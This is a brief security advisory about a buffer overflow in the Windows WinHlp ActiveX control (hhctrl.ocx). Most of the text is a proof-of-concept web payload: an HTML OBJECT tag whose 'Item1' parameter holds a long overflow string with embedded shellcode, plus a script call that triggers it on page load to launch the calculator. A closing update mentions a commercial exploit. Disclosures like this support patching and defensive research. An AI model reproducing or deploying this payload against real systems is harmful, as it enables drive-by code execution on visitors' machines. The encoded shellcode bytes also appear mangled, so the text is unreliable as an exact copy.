|
Microsoft Windows WinHlp Item Buffer Overflow Vulnerability
The following proof-of-concept code will open the calculator on the client system: <OBJECT classid=clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11 codeBase=hhctrl.ocx#Version=4,72,8252,0 height=0 id=winhelp type=application/x-oleobject width=0><PARAM NAME="Width" VALUE="26"><PARAM NAME="Height" VALUE="26"><PARAM NAME="Command" VALUE="WinHelp"><PARAM NAME="Item1" VALUE="^Ã^Ã^Ã^Ã^Ã^Ã^Ã^Ã3Ã?Phcalc^Ã4$ƒÃ?PV¸¯§éw^?Ã3Ã?P¾”^Ãéw^?Ã?AAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMNNNNOOOOP PPPQQQQRRRRSSSSTTTAAAA©õwABCDEFGH^ÃÃ?^?ægMyWindow"><PARAM NAME="Item2" VALUE="NGS Software LTD"></OBJECT> <SCRIPT>winhelp.HHClick()</SCRIPT> UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild. |
|
 Privacy Statement |
